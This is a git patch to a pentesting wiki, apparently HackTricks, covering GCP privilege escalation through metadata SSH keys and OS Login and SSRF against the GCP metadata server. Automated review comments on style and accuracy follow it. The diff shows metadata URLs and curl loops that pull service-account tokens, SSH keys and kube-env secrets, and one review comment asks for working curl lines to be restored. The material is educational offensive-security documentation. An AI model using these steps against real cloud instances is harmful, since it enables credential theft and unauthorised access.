From 428691a66033f7bd82f6cef3369a14c3ff2ff7e9 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 13 Feb 2022 18:46:11 +0000 Subject: [PATCH] GitBook: [#3009] No subject --- .../gcp-privesc-to-other-principals.md | 32 ------- ...local-privilege-escalation-ssh-pivoting.md | 42 ++++----- .../cloud-ssrf.md | 90 ++++--------------- 3 files changed, 40 insertions(+), 124 deletions(-) diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md index fba5442f..b5a50e60 100644 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md 
@@ -154,38 +154,6 @@ For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-pri **Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). -## compute - -### compute.projects.setCommonInstanceMetadata - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -* Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -* You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -### compute.instances.setMetadata - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**. - -### compute.instances.setIamPolicy - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. - -### **compute.instances.osLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance. 
- -### **compute.instances.osAdminLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance. - ## container ### container.clusters.get diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md index 15c6f6f2..756d8588 100644 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md @@ -48,6 +48,8 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic * `https://www.googleapis.com/auth/compute` * `https://www.googleapis.com/auth/cloud-platfo`rm +## **Add SSH keys** + ### **Add SSH keys to custom metadata** **Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**. 
@@ -147,7 +149,26 @@ gcloud compute ssh [INSTANCE NAME] This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods. -### SSH keys at project level +## **Using OS Login** + +[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. + +OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. + +OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. + +The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: + +* **roles/compute.osLogin** (no sudo) +* **roles/compute.osAdminLogin** (has sudo) + +Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. + +If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. + +Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. 
+ +## SSH keys at project level Following the details mentioned in the previous section you can try to compromise more VMs. 
@@ -159,25 +180,6 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. -## **Using OS Login** - -****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. - -OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. - -OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. - -The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: - -* **compute.instances.osLogin** (no sudo) -* **compute.instances.osAdminLogin** (has sudo) - -Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. - -If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. - -Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. 
- ## Search for Keys in the filesystem It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index bb556167..a47100f5 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md 
@@ -92,81 +92,21 @@ Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACC ### SSRF URL for Google Cloud -Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: +Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” -* http://169.254.169.254 -* http://metadata.google.internal -* http://metadata +``` +http://169.254.169.254/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/ +http://metadata/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/instance/hostname +http://metadata.google.internal/computeMetadata/v1/instance/id +http://metadata.google.internal/computeMetadata/v1/project/project-id +``` -Interesting endpoints to extract information: +Google allows recursive pulls -```bash -# /project -## Project name and number -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id -## Project attributes -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true - -# /oslogin -## users -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users -## groups -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups -## security-keys -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys -## authorize -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize - -# /instance -## Description -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description -## Hostname -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname -## ID -curl -H "Metadata-Flavor:Google" 
http://metadata/computeMetadata/v1/instance/id -## Image -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image -## Machine Type -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type -## Name -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name -## Tags -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags -## Zone -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone -## Network Interfaces -for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do - echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip") - echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask") - echo " Gateway: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway") - echo " DNS: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers") - echo " Network: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network") - echo " ============== " -done -## Service Accounts -for sa in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do - echo " Name: $sa" - echo " Email: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email") - echo " Aliases: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases") - echo " Identity: 
"$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity") - echo " Scopes: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes") - echo " Token: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token") - echo " ============== " -done -## K8s Attributtes -### Cluster location -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location -### Cluster name -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name -### Os-login enabled -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin -### Kube-env -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env -### Kube-labels -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels -### Kubeconfig -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig +``` +http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true ``` Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) 
@@ -176,6 +116,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` +Interesting files to pull out: + +* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json) +* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token) +* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json) + ### Add an SSH key Extract the token
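Review bot: the first hunk (gcp-privesc-to-other-principals.md, -154,38) deletes the whole `## compute` section (compute.projects.setCommonInstanceMetadata, compute.instances.setMetadata, compute.instances.setIamPolicy, compute.instances.osLogin, compute.instances.osAdminLogin) without a replacement or a pointer, so the interesting-permissions page loses its only mention of these five permissions together with the two stated limitations (the default limited scope of VM service accounts, and needing to reach the SSH server). If the intent is to consolidate this into gcp-local-privilege-escalation-ssh-pivoting.md, which gains the OS Login section later in this patch, keep a `## compute` heading with the existing `{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}` stub so the permission names stay searchable on this page; otherwise reinstate the section.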
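Review bot: in the -48,6 +48,8 hunk the new `## **Add SSH keys**` heading is bold while the other second-level heading this patch promotes (`## SSH keys at project level`) is not; pick one style. The context line just above, `https://www.googleapis.com/auth/cloud-platfo`rm, has its closing backtick inside the URL and renders the scope name broken; since this hunk already touches the region, close the code span after `cloud-platform`.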
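Review bot: in the -147,7 +149,26 hunk the sentence "If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`**" is cut into a fragment by the full stop; use a comma. The paragraph announces "two IAM permissions" but the list now names roles (`roles/compute.osLogin`, `roles/compute.osAdminLogin`), whereas the copy removed in the next hunk listed `compute.instances.osLogin` / `compute.instances.osAdminLogin`; either say "IAM roles" or list the permissions, and use the same form as the rest of the page. Placement: `## SSH keys at project level` still opens with "Following the details mentioned in the previous section", which referred to the SSH-key methods; with `## Using OS Login` inserted in between, that reference now points at OS Login, so reword it (for example "the Add SSH keys section above") or move the OS Login section after the project-level one.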
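Review bot: the -159,25 +180,6 hunk is the old copy of the OS Login section being moved; the stray `****[**OS Login**]… ****` bold markers of this copy are rightly dropped in the new one, but the permission names (`compute.instances.osLogin` / `compute.instances.osAdminLogin`) become role names in the moved copy, so confirm that is a deliberate correction rather than a transcription slip before both copies disagree with the other page.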
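Review bot: in the cloud-ssrf.md -92,81 +92,21 hunk the rewritten line "Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”" drops the rest of the original sentence and swaps straight quotes for typographic ones; anyone copying the header into a curl command gets a literal curly quote, so keep ASCII quotes or backticks and finish the sentence. Replacing the 60-line curl enumeration with six bare URLs also removes the only lines on the page that show the header actually being sent, the `?recursive=true` usage on `/project/attributes/`, and the `/instance/service-accounts/<sa>/{email,scopes,token}` and `/instance/attributes/{kube-env,enable-oslogin,…}` paths, which the new v1beta1 list below restores only partly; if brevity is the goal, keep at least one complete `curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/...` line and one recursive example on the v1 path so the page still demonstrates the header requirement it states. "Google allows recursive pulls" is now a fragment whose single example, `/instance/disks/?recursive=true`, is narrower than the removed `/project/attributes/?recursive=true`; say where the parameter applies (the removed and retained lines show it on `/project/attributes/`, `/instance/disks/` and the v1beta1 root).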
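Review bot: in the -176,6 +116,12 hunk the three new bullets are labelled "Interesting files to pull out" but they are metadata endpoints, not files, and each link's text is its own href in backticks, which doubles every URL in rendered output; plain inline code with a short label per bullet reads better. "Kubernetes Key" for `instance/attributes/kube-env` does not match the name the removed block used ("Kube-env" under "K8s Attributtes", itself a typo for "Attributes"); use the attribute name. All three bullets depend on the v1beta1 path, which the preceding context line describes as header-free "atm"; that is a time-bound claim, so date it (this patch is from Feb 2022) and list the v1 equivalents alongside (`/computeMetadata/v1/project/attributes/ssh-keys`, `/computeMetadata/v1/instance/service-accounts/default/token`, `/computeMetadata/v1/instance/attributes/kube-env`, following the v1 path structure the removed curl block documented) so the list remains useful if the beta endpoint is withdrawn.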